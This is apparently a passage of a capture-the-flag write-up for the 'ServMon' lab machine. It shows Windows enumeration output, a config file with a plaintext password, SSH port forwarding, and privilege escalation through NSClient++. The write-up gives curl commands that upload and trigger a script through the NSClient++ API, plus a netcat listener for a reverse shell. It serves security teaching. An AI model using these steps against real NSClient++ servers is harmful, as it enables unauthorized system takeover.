  TCP    10.10.10.184:5040      10.10.14.54:48722      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48724      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48726      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48728      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48730      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48732      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48816      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48922      CLOSE_WAIT      4880
  TCP    10.10.10.184:5040      10.10.14.54:48924      CLOSE_WAIT      4880
  TCP    10.10.10.184:6699      10.10.14.49:47420      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.49:47454      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.49:47510      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.49:47562      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.49:47830      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.49:47866      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.97:49926      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.97:49946      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.97:52100      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.97:54970      CLOSE_WAIT      3100
  TCP    10.10.10.184:6699      10.10.14.97:55518      ESTABLISHED     3100
  TCP    10.10.10.184:6699      10.10.14.97:56248      ESTABLISHED     3100
  TCP    127.0.0.1:49674        127.0.0.1:49675        ESTABLISHED     3100
  TCP    127.0.0.1:49675        127.0.0.1:49674        ESTABLISHED     3100
  TCP    127.0.0.1:49676        127.0.0.1:49677        ESTABLISHED     3100
  TCP    127.0.0.1:49677        127.0.0.1:49676        ESTABLISHED     3100
  TCP    [::]:21                [::]:0                 LISTENING       2644
  TCP    [::]:22                [::]:0                 LISTENING       2784
  TCP    [::]:135               [::]:0                 LISTENING       872
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5666              [::]:0                 LISTENING       3380
  TCP    [::]:49664             [::]:0                 LISTENING       628
  TCP    [::]:49665             [::]:0                 LISTENING       484
  TCP    [::]:49666             [::]:0                 LISTENING       1120
  TCP    [::]:49667             [::]:0                 LISTENING       1528
  TCP    [::]:49668             [::]:0                 LISTENING       2092
  TCP    [::]:49669             [::]:0                 LISTENING       620
  TCP    [::]:49670             [::]:0                 LISTENING       2480
  UDP    0.0.0.0:123            *:*                                    3768
  UDP    0.0.0.0:500            *:*                                    2488
  UDP    0.0.0.0:4500           *:*                                    2488
  UDP    0.0.0.0:5050           *:*                                    4880
  UDP    0.0.0.0:5353           *:*                                    1616
  UDP    0.0.0.0:5355           *:*                                    1616
  UDP    0.0.0.0:61812          *:*                                    3380
  UDP    10.10.10.184:137       *:*                                    4
  UDP    10.10.10.184:138       *:*                                    4
  UDP    10.10.10.184:1900      *:*                                    5032
  UDP    10.10.10.184:23456     *:*                                    3100
  UDP    10.10.10.184:23456     *:*                                    3100
  UDP    10.10.10.184:57058     *:*                                    3100
  UDP    10.10.10.184:58079     *:*                                    5032
  UDP    127.0.0.1:1900         *:*                                    5032
  UDP    127.0.0.1:58080        *:*                                    5032
  UDP    127.0.0.1:61811        *:*                                    3380
  UDP    127.0.0.1:61850        *:*                                    2968
  UDP    [::]:123               *:*                                    3768
  UDP    [::]:500               *:*                                    2488
  UDP    [::]:4500              *:*                                    2488
  UDP    [::]:5353              *:*                                    1616
  UDP    [::]:5355              *:*                                    1616
  UDP    [::1]:1900             *:*                                    5032
  UDP    [::1]:58078            *:*                                    5032
  UDP    [fe80::405e:6db1:cf1b:2fec%3]:1900  *:*                                    5032
  UDP    [fe80::405e:6db1:cf1b:2fec%3]:58077  *:*                                    5032


-----------------------------------------------------------
 Firewall Status
-----------------------------------------------------------

Firewall is Disabled

-----------------------------------------------------------
 FireWall Rules
-----------------------------------------------------------

Name                                                                                                                
----                                                                                                                
@{Microsoft.AAD.BrokerPlugin_1000.17763.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugi...
@{Microsoft.AAD.BrokerPlugin_1000.17763.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugi...
@{Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlu...
@{Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlu...
@{Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.DesktopAppInstaller/Resour...
@{Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.DesktopAppInstaller/Resour...
@{Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.DesktopAppInstaller/Resour...
@{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName}
@{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName}

... SNIP ...

@{Microsoft.ZuneVideo_10.19101.10711.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.ZuneVideo/resources/IDS_MANIFES...
@{Microsoft.ZuneVideo_10.20022.11011.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.ZuneVideo/resources/IDS_MANIFES...
Microsoft Solitaire Collection                                                                                      
Microsoft Solitaire Collection                                                                                      
OneNote                                                                                                             
OneNote                                                                                                             
Print 3D                                                                                                            
Print 3D                                                                                                            
Skype                                                                                                               
Skype                                                                                                               
Xbox Game Bar                                                                                                       
Xbox Game Bar                                                                                                       
Xbox Game Bar                                                                                                       
nvms-1000                                                                                                           
nvms-1000                                                                                                           
NSClient++ Monitoring Agent                                                                                         
Spotify Music                                                                                                       
Spotify Music                                                                                                       
Spotify Music                                                                                                       
Spotify Music                                                                                                       
Spotify Music                                                                                                       
Spotify Music                                                                                                       
Wireless Display Infrastructure Back Channel (TCP-In)                                                               
Network Discovery (WSD-In)                                                                                          
Wi-Fi Direct Network Discovery (In)                                                                                 
Cast to Device streaming server (RTCP-Streaming-In)                                                                 
Cast to Device streaming server (RTCP-Streaming-In)                                                                 
Cast to Device streaming server (RTCP-Streaming-In)                                                                 
Cast to Device streaming server (RTSP-Streaming-In)                                                                 
Cast to Device streaming server (RTSP-Streaming-In)                                                                 
Cast to Device streaming server (RTSP-Streaming-In)                                                                 
OpenSSH SSH Server (sshd)                                                                                           
Proximity sharing over TCP (TCP sharing-In)                                                                         
File and Printer Sharing (Spooler Service - RPC)                                                                    
Wi-Fi Direct Spooler Use (In)                                                                                       
@FirewallAPI.dll,-80201                                                                                             
@FirewallAPI.dll,-80206                                                                                             
AllJoyn Router (TCP-In)                                                                                             
AllJoyn Router (UDP-In)                                                                                             
Cast to Device functionality (qWave-TCP-In)                                                                         
Cast to Device functionality (qWave-UDP-In)                                                                         
Cast to Device SSDP Discovery (UDP-In)                                                                              
Connected Devices Platform - WiFi Direct Transport (TCP-In)                                                         
Connected Devices Platform (TCP-In)                                                                                 
Connected Devices Platform (UDP-In)                                                                                 
Core Networking - Dynamic Host Configuration Protocol (DHCP-In)                                                     
Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)                                           
Core Networking - Teredo (UDP-In)                                                                                   
Delivery Optimization (TCP-In)                                                                                      
Delivery Optimization (UDP-In)                                                                                      
File and Printer Sharing (LLMNR-UDP-In)                                                                             
File and Printer Sharing (Spooler Service - RPC-EPMAP)                                                              
FTP Server (FTP Traffic-In)                                                                                         
FTP Server Passive (FTP Passive Traffic-In)                                                                         
FTP Server Secure (FTP SSL Traffic-In)                                                                              
mDNS (UDP-In)                                                                                                       
mDNS (UDP-In)                                                                                                       
mDNS (UDP-In)                                                                                                       
Network Discovery (LLMNR-UDP-In)                                                                                    
Network Discovery (Pub-WSD-In)                                                                                      
Network Discovery (SSDP-In)                                                                                         
Network Discovery (WSD-In)                                                                                          
WFD ASP Coordination Protocol (UDP-In)                                                                              
Wi-Fi Direct Scan Service Use (In)                                                                                  
Wireless Display (TCP-In)                                                                                           
Cast to Device streaming server (HTTP-Streaming-In)                                                                 
Cast to Device streaming server (HTTP-Streaming-In)                                                                 
Cast to Device streaming server (HTTP-Streaming-In)                                                                 
Cast to Device UPnP Events (TCP-In)                                                                                 
Core Networking - Destination Unreachable (ICMPv6-In)                                                               
Core Networking - Destination Unreachable Fragmentation Needed (ICMPv4-In)                                          
Core Networking - Internet Group Management Protocol (IGMP-In)                                                      
Core Networking - IPHTTPS (TCP-In)                                                                                  
Core Networking - IPv6 (IPv6-In)                                                                                    
Core Networking - Multicast Listener Done (ICMPv6-In)                                                               
Core Networking - Multicast Listener Query (ICMPv6-In)                                                              
Core Networking - Multicast Listener Report (ICMPv6-In)                                                             
Core Networking - Multicast Listener Report v2 (ICMPv6-In)                                                          
Core Networking - Neighbour Discovery Advertisement (ICMPv6-In)                                                     
Core Networking - Neighbour Discovery Solicitation (ICMPv6-In)                                                      
Core Networking - Packet Too Big (ICMPv6-In)                                                                        
Core Networking - Parameter Problem (ICMPv6-In)                                                                     
Core Networking - Router Advertisement (ICMPv6-In)                                                                  
Core Networking - Router Solicitation (ICMPv6-In)                                                                   
Core Networking - Time Exceeded (ICMPv6-In)                                                                         
DIAL protocol server (HTTP-In)                                                                                      
DIAL protocol server (HTTP-In)                                                                                      
File and Printer Sharing (Echo Request - ICMPv4-In)                                                                 
File and Printer Sharing (Echo Request - ICMPv6-In)                                                                 
File and Printer Sharing (NB-Datagram-In)                                                                           
File and Printer Sharing (NB-Name-In)                                                                               
File and Printer Sharing (NB-Session-In)                                                                            
File and Printer Sharing (SMB-In)                                                                                   
Network Discovery (NB-Datagram-In)                                                                                  
Network Discovery (NB-Name-In)                                                                                      
Network Discovery (UPnP-In)                                                                                         
Network Discovery (WSD Events-In)                                                                                   
Network Discovery (WSD EventsSecure-In)                                                                             
WFD Driver-only (TCP-In)                                                                                            
WFD Driver-only (UDP-In)                                                                                            
@{Microsoft.AAD.BrokerPlugin_1000.17763.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugi...
@{Microsoft.AAD.BrokerPlugin_1000.17763.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugi...
@{Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlu...
@{Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlu...
@{Microsoft.AccountsControl_10.0.17763.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources...
@{Microsoft.AccountsControl_10.0.17763.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources...
@{Microsoft.AccountsControl_10.0.18362.449_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resourc...
@{Microsoft.AccountsControl_10.0.18362.449_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resourc...
@{Microsoft.BingNews_4.36.20714.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.BingNews/Resources/ApplicationTitleW...
@{Microsoft.BingWeather_4.34.13393.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.BingWeather/Resources/Application...
... SNIP ...
@{Microsoft.GetHelp_10.1912.30071.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.GetHelp/Resources/appDisplayName}    
@{Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Getstarted/Resources/AppStoreName}    
@{Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Getstarted/Resources/AppStoreName}    
@{Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Getstarted/Resources/AppStoreName}    
@{Microsoft.LockApp_10.0.17763.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}   
@{Microsoft.LockApp_10.0.17763.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}   
@{Microsoft.LockApp_10.0.18362.449_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName} 
@{Microsoft.LockApp_10.0.18362.449_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName} 
@{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName}
@{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName}
@{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName}
@{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName}
@{Microsoft.Microsoft3DViewer_7.1908.9012.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Microsoft3DViewer/Common.V...
@{Microsoft.Microsoft3DViewer_7.1908.9012.0_x64__8wekyb3d8bbwe?ms-
@{Microsoft.Windows.ParentalControls_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windo...
@{Microsoft.Windows.ParentalControls_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windo...
@{Microsoft.Windows.PeopleExperienceHost_10.0.17763.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windo...
@{Microsoft.Windows.PeopleExperienceHost_10.0.17763.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windo...
@{Microsoft.Windows.PeopleExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Win...
@{Microsoft.Windows.PeopleExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Win...
@{Microsoft.Windows.Photos_2019.19081.22010.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Windows.Photos/Resources...
@{Microsoft.Windows.Photos_2019.19081.22010.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Windows.Photos/Resources...

... SNIP ...

Proximity sharing over TCP (TCP sharing-Out)                                                                        
Wi-Fi Direct Spooler Use (Out)                                                                                      
@FirewallAPI.dll,-80204                                                                                             
AllJoyn Router (TCP-Out)                                                                                            
AllJoyn Router (UDP-Out)                                                                                            
Cast to Device functionality (qWave-TCP-Out)                                                                        
Cast to Device functionality (qWave-UDP-Out)                                                                        
Connected Devices Platform - WiFi Direct Transport (TCP-Out)                                                        
Connected Devices Platform (TCP-Out)                                                                                
Connected Devices Platform (UDP-Out)                                                                                
Connected User Experiences and Telemetry                                                                            
Core Networking - DNS (UDP-Out)                                                                                     
Core Networking - Dynamic Host Configuration Protocol (DHCP-Out)                                                    
Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-Out)                                         
Core Networking - Group Policy (TCP-Out)                                                                            
Core Networking - IPHTTPS (TCP-Out)                                                                                 
Core Networking - Teredo (UDP-Out)                                                                                  
File and Printer Sharing (LLMNR-UDP-Out)                                                                            
FTP Server (FTP Traffic-Out)                                                                                        
FTP Server Secure (FTP SSL Traffic-Out)                                                                             
mDNS (UDP-Out)                                                                                                      
mDNS (UDP-Out)                                                                                                      
mDNS (UDP-Out)                                                                                                      
Network Discovery (LLMNR-UDP-Out)                                                                                   
Network Discovery (Pub WSD-Out)                                                                                     
Network Discovery (SSDP-Out)                                                                                        
Network Discovery (UPnPHost-Out)                                                                                    
Network Discovery (UPnP-Out)                                                                                        
Network Discovery (WSD Events-Out)                                                                                  
Network Discovery (WSD EventsSecure-Out)                                                                            
Network Discovery (WSD-Out)                                                                                         
Recommended Troubleshooting Client (HTTP/HTTPS Out)                                                                 
WFD ASP Coordination Protocol (UDP-Out)                                                                             
Wi-Fi Direct Scan Service Use (Out)                                                                                 
Windows Device Management Enrolment Service (TCP out)                                                               
Wireless Display (TCP-Out)                                                                                          
Wireless Display (UDP-Out)                                                                                          
Core Networking - Group Policy (NP-Out)                                                                             
Core Networking - Internet Group Management Protocol (IGMP-Out)                                                     
Core Networking - IPv6 (IPv6-Out)                                                                                   
Core Networking - Multicast Listener Done (ICMPv6-Out)                                                              
Core Networking - Multicast Listener Query (ICMPv6-Out)                                                             
Core Networking - Multicast Listener Report (ICMPv6-Out)                                                            
Core Networking - Multicast Listener Report v2 (ICMPv6-Out)                                                         
Core Networking - Neighbour Discovery Advertisement (ICMPv6-Out)                                                    
Core Networking - Neighbour Discovery Solicitation (ICMPv6-Out)                                                     
Core Networking - Packet Too Big (ICMPv6-Out)                                                                       
Core Networking - Parameter Problem (ICMPv6-Out)                                                                    
Core Networking - Router Advertisement (ICMPv6-Out)                                                                 
Core Networking - Router Solicitation (ICMPv6-Out)                                                                  
Core Networking - Time Exceeded (ICMPv6-Out)                                                                        
File and Printer Sharing (Echo Request - ICMPv4-Out)                                                                
File and Printer Sharing (Echo Request - ICMPv6-Out)                                                                
File and Printer Sharing (NB-Datagram-Out)                                                                          
File and Printer Sharing (NB-Name-Out)                                                                              
File and Printer Sharing (NB-Session-Out)                                                                           
File and Printer Sharing (SMB-Out)                                                                                  
Network Discovery (NB-Datagram-Out)                                                                                 
Network Discovery (NB-Name-Out)                                                                                     
WFD Driver-only (TCP-Out)                                                                                           
WFD Driver-only (UDP-Out)                                                                                           


-----------------------------------------------------------
 Hosts File Content
-----------------------------------------------------------

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost


-----------------------------------------------------------
 Processes
-----------------------------------------------------------

-----------------------------------------------------------
 Scheduled Tasks
-----------------------------------------------------------
Current System Time: 06/20/2020 04:03:44

TaskName    : \OneDrive Standalone Update Task-S-1-5-21-3877449121-2587550681-992675040-1002
Run As User : SERVMON\Nadine
Task To Run : %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe 

TaskName    : \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319
Run As User : SYSTEM
Task To Run : COM handler

TaskName    : \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64
Run As User : SYSTEM
Task To Run : COM handler

TaskName    : \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical
Run As User : SYSTEM
Task To Run : COM handler

TaskName    : \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical
Run As User : SYSTEM
Task To Run : COM handler

...SNIP ...

TaskName    : \Microsoft\Windows\Workplace Join\Recovery-Check
Run As User : INTERACTIVE
Task To Run : %SystemRoot%\System32\dsregcmd.exe /checkrecovery

TaskName    : \Microsoft\Windows\WwanSvc\NotificationTask
Run As User : INTERACTIVE
Task To Run : %SystemRoot%\System32\WiFiTask.exe wwan

TaskName    : \Microsoft\XblGameSave\XblGameSaveTask
Run As User : SYSTEM
Task To Run : %windir%\System32\XblGameSaveTask.exe standby




-----------------------------------------------------------
 Services
-----------------------------------------------------------


-----------------------------------------------------------
 Installed Programs
-----------------------------------------------------------

-----------------------------------------------------------
 Installed Patches
-----------------------------------------------------------

-----------------------------------------------------------
 Program Folders
-----------------------------------------------------------

C:\Program Files
-------------
Common Files                               
Internet Explorer                          
ModifiableWindowsApps                      
NSClient++                                 
Reference Assemblies                       
UNP                                        
VMware                                     
Windows Defender                           
Windows Defender Advanced Threat Protection
Windows Mail                               
Windows Multimedia Platform                
Windows NT                                 
Windows Photo Viewer                       
Windows Portable Devices                   
Windows Security                           
WindowsPowerShell                          


C:\Program Files (x86)
-------------------
Common Files                          
InstallShield Installation Information
Internet Explorer                     
Microsoft.NET                         
NVMS-1000                             
Reference Assemblies                  
Windows Defender                      
Windows Mail                          
Windows Multimedia Platform           
Windows NT                            
Windows Photo Viewer                  
Windows Portable Devices              
WindowsPowerShell                     



-----------------------------------------------------------
 Files with Full Control and Modify Access
-----------------------------------------------------------

C:\Users\Nadine\Desktop\user.txt
C:\Users\Nadine\out.txt         
C:\Users\Nadine\scan.txt        



Failed to read more files
-----------------------------------------------------------
 Folders with Full Control and Modify Access
-----------------------------------------------------------

Failed to read more folders

Failed to read more folders

Failed to read more folders

Failed to read more folders

-----------------------------------------------------------
 Mapped Drives
-----------------------------------------------------------
-----------------------------------------------------------
 Unquoted Service Paths
-----------------------------------------------------------

-----------------------------------------------------------
 Recent Documents
-----------------------------------------------------------

AutomaticDestinations
CustomDestinations   
The Internet.lnk     



-----------------------------------------------------------
 Potentially Interesting Files in Users Directory 
-----------------------------------------------------------
C:\Users\Nadine\Desktop\user.txt
C:\Users\Nadine\out.txt
C:\Users\Nadine\scan.txt

-----------------------------------------------------------
 10 Last Modified Files in C:\User
-----------------------------------------------------------
C:\Users\Nadine\Links
C:\Users\Nadine\Desktop
C:\Users\Nadine\Documents
C:\Users\Administrator
C:\Users\Public
C:\Users\Nathan
C:\Users\Nadine\Desktop\user.txt
C:\Users\Nadine\out.txt
C:\Users\Nadine
C:\Users\Nadine\scan.txt

-----------------------------------------------------------
 MUICache Files
-----------------------------------------------------------


-----------------------------------------------------------
 System Files with Passwords
-----------------------------------------------------------

-----------------------------------------------------------
 AlwaysInstalledElevated Registry Key
-----------------------------------------------------------

-----------------------------------------------------------
 Stored Credentials
-----------------------------------------------------------

Currently stored credentials:

* NONE *

-----------------------------------------------------------
 Checking for AutoAdminLogon 
-----------------------------------------------------------
The default username is Nathan 
The default password is  
The default domainname is SERVMON 

Anyway, while digging through the NSClient++ folder, I found some interesting files.

NSClient++ Folder contents

After investigating a few of the files (boot.ini, changelog.txt, nsclient.log content of security/, scripts/, and crash-dumps) I decided to look at the most likely culprit - nsclient.ini. I like looking at the most likely candidate last, so that I do a thorough investigating of all the content. If I check the most interesting file first and find something, it often leads me down rabbit holes and results in me tunneling on a single piece of information.

As expected, nsclient.ini has some interesting content:

$ nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
´╗┐# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive
monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. Enter any command line here a
nd they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be repla
ced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%
`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile
-command -


; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax
 is: `command=script arguments`
[/settings/external scripts/scripts]


; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts module (CheckExternalScripts)
.
[/settings/external scripts]
allow arguments = true
nsclient.ini

As we can see, there are two interesting pieces of information in here:

  1. The password: ew2x6SsGTxjRwXOT
  2. The fact that access is restricted to 127.0.0.1

Of course, I still wanted to verify, so I tried to log in. Surprisingly enough, it did not work.

Configfiles don't lie!

So, what's next? SSH Port Forwarding to the rescue! There are multiple ways to do it, but since I already had an SSH-connection, I decided to go with the Konami-code approach. In short: On a new line, that has not had any content on it (just press enter...), type the following key combination, followed by hitting the <ENTER>-key: ~C  (Capital C is REQIRED!)

That should take you into the following prompt, where you can do SSH magic. Notice how the shell line changes. Also notice that in order to validate the command, another enter is required to pop back to a normal shell.

SSH Forwarding

What happened here is that Port 8443 on my local machine gets forwarded to 127.0.0.1:8443 on ServMon! If this is difficult to understand, check out this video by @Ippsec! The practical explanation of it is that 8443 on my machine is now the same as 8443 on ServMon.

If we access the page and try the password again now, using 127.0.0.1 as the host instead of 10.10.10.184, we can log in to the web interface. The credentials work, so we have verified they are valid!

Success!

Exploiting NSClient++

Unfortunately, this web interface is buggy beyond belief and any attempt I made to use it refused to work. Since I already had found a exploit during previous recon, I decided to check the content of both.

The privilege escalation vulnerability found in Searchsploit was a good match and definitely applied here. It was incredibly frustrating that the web interface didn't respond, as I knew how to exploit it, it just wouldn't let me. No problem though, to the API docs we go!

After lots of searching, reading, testing and guessing, I found two magic API calls! Developers - please use these API docs as a cautionary tale. I am sure the developers of NSClient++ tried their best, but the documentation is very difficult to understand.

Anyways, the two magic commands were:

# Add new script / command - @run4.bat attaches data from the run4.bat file
$ curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/run4.bat --data-binary @run4.bat


# Trigger script / command
$ curl -k -v -H 'password: ew2x6SsGTxjRwXOT' 'https://127.0.0.1:8443/query/run4'

Execution of the above commands looked like this:

Add new command. Note that you have to input the password!
Executing the command

If you are wondering what to put in run4.bat, hold on! We'll get to that in a second. We have figured out how this works, now we need a reverse shell payload! I was stuck here for a while as well, due to limitations on the box.

AntiVirus triggered on normal payloads and PowerShell restricted execution of scripts, leading to all the simple solutions I normally use being blocked (Want to know how I found out? Check the upload-screenshots  ¯\_(ツ)_/¯ ).

I considered using MSF Venom to avoid the AV, but figured since it is an easy box that is probably over-engineering things. I decided to try the simple solution of uploading a netcat executable to the box to check if it worked. If not, MSF Venom was waiting patiently for me.

Step 1: Find a netcat binary

Kali comes with netcat binaries by default <3

Step 2: Upload binary to the box

Python server hosting the executable
Pulling the netcat binary down to the ServMon box

Time to create the command used for exploitation. I promise it is called run4 because I like the number 4 and not because it was the fifth iteration of payloads ! (Real programmers start from 0 !!! ^-* )

This was my final payload. Seems easy but I ran into some issues on my way there. (For example, why isn't my command running? Turns out -c is NOT the correct flag for netcat...)

Final iteration of payloads

I made sure to use unique command names for my exploitation in order to avoid issues, but I am not sure if this was necessary. At this point, I was too lazy to check, since the service frequently bugged out and shut down for 10-15 minutes at the time.

Anyway, set up the listener (nc -lvnp 9008), create another command/script and trigger it as indicated above. And OH YEAH - We got root!

Callback received

All that is left is to grab the flag and submit it

Get the root flag
Flag submitted

It was an easy and fun box, except the web interface at the end.

Thanks for reading - See you soon!

And as always, a bonus puppy picture to whoever makes it to the end! This time, it is a two for one special!

Hacker Shiba
Relax Shiba